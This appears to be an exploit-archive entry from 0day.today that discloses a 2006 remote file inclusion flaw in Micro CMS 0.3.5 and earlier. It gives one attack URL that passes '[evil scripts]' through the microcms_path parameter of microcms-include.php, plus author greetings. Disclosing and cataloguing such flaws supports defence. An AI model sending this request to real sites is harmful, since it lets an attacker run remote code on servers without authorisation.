id: 529
date: 06/18/2006
title: Micro CMS <= 0.3.5 (microcms_path) Remote File Include Vulnerability
author: CeNGiZ-HaN
cves: 

====================================================================
Micro CMS <= 0.3.5 (microcms_path) Remote File Include Vulnerability
====================================================================




########################################################################################
# Find By: CeNGiZ-HaN  ( guerilla@cyberkatliam.org )
# Risk   : High
# Script : micro cms www.impliedbydesign.com
########################################################################################
# GreeTz Al S-D-T Members //// Remote File inclusion //// (microcms_path)
########################################################################################
#
#
# http://target/micro_cms_path/micro_cms_files/microcms-include.php?microcms_path=[evil scripts]
#  
#
#
#########################################################################################
#########################################################################################



#  0day.today [2023-03-22]  #